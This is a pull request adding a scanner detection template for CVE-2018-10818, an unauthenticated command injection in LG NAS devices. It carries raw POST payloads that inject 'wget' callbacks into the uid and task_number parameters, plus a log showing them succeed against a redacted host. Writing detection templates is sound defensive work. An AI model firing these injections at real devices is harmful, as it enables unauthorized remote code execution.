### PR TITLE
Create CVE-2018-10818.yaml

### DIFF
--- a/cves/2018/CVE-2018-10818.yaml
+++ b/cves/2018/CVE-2018-10818.yaml
@@ -1,0 +1,42 @@
+id: CVE-2018–10818
+
+info:
+  name: LG NAS Devices - Remote Code Execution (Unauthenticated)
+  author: gy741
+  severity: critical
+  description: The vulnerability (CVE-2018-10818) is a pre-auth remote command injection vulnerability found in the majority of LG NAS devices. You cannot simply log in with any random username and password. However, there lies a command injection vulnerability in the “password” parameter.
+  reference: |
+    - https://www.vpnmentor.com/blog/critical-vulnerability-found-majority-lg-nas-devices/
+    - https://medium.com/@0x616163/lg-n1a1-unauthenticated-remote-command-injection-cve-2018-14839-9d2cf760e247
+  tags: cve,cve2018,lg-nas,rce
+
+requests:
+  - raw:
+      - |
+        POST /system/sharedir.php HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: curl/7.58.0
+        Accept: */*
+        Content-Type: application/x-www-form-urlencoded
+
+        &uid=10; wget http://{{interactsh-url}}
+
+      - |
+        POST /en/php/usb_sync.php HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: curl/7.58.0
+        Accept: */*
+        Content-Type: application/x-www-form-urlencoded
+
+        &act=sync&task_number=1;wget http://{{interactsh-url}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol # Confirms the HTTP Interaction
+        words:
+          - "http"
+
+      - type: status
+        status:
+          - 200

--- a/cves/2018/CVE-2018-10818.yaml
+++ b/cves/2018/CVE-2018-10818.yaml
@@ -8,7 +8,7 @@ info:
   reference: |
     - https://www.vpnmentor.com/blog/critical-vulnerability-found-majority-lg-nas-devices/
     - https://medium.com/@0x616163/lg-n1a1-unauthenticated-remote-command-injection-cve-2018-14839-9d2cf760e247
-  tags: cve,cve2018,lg-nas,rce
+  tags: cve,cve2018,lg-nas,rce,oob
 
 requests:
   - raw:


### PR DESCRIPTION
### Template / PR Information

Hello,

Added CVE-2018-10818 detection rules.

```
The vulnerability (CVE-2018-10818) is a pre-auth remote command injection vulnerability found in the majority of LG NAS devices. You cannot simply log in with any random username and password. However, there lies a command injection vulnerability in the “password” parameter.
````

Thanks.

### Template Validation

I've validated this template locally?
- [v] YES
- [ ] NO


```
POST /system/sharedir.php HTTP/1.1
Host: xxx.xxxx.xxx.com
User-Agent: curl/7.58.0
Connection: close
Content-Length: 66
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

&uid=10; wget http://c3veutoo7edqpfgga1m0cd9q66eyyyyyn.interact.sh
[INF] [CVE-2018–10818] Dumped HTTP response for http://xxx.xxxx.xxx.com/system/sharedir.php

HTTP/1.1 200 OK
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
Date: Mon, 26 Jul 2021 17:22:41 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8g DAV/2 PHP/5.2.11 with Suhosin-Patch
X-Powered-By: PHP/5.2.11

MSG OK

[INF] [CVE-2018–10818] Dumped HTTP request for http://xxx.xxxx.xxx.com

POST /en/php/usb_sync.php HTTP/1.1
Host: xxx.xxxx.xxx.com
User-Agent: curl/7.58.0
Connection: close
Content-Length: 81
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

&act=sync&task_number=1;wget http://c3veutoo7edqpfgga1m0cd9q66oyyyyyr.interact.sh
[INF] [CVE-2018–10818] Dumped HTTP response for http://xxx.xxxx.xxx.com/en/php/usb_sync.php

HTTP/1.1 200 OK
Connection: close
Content-Length: 14
Content-Type: text/html; charset=utf-8
Date: Mon, 26 Jul 2021 17:22:42 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8g DAV/2 PHP/5.2.11 with Suhosin-Patch
X-Pad: avoid browser bug
X-Powered-By: PHP/5.2.11

ok:complete
[2021-07-27 02:23:11] [CVE-2018–10818] [http] [critical] http://xxx.xxxx.xxx.com/system/sharedir.php
[2021-07-27 02:23:11] [CVE-2018–10818] [http] [critical] http://xxx.xxxx.xxx.com/en/php/usb_sync.php
```
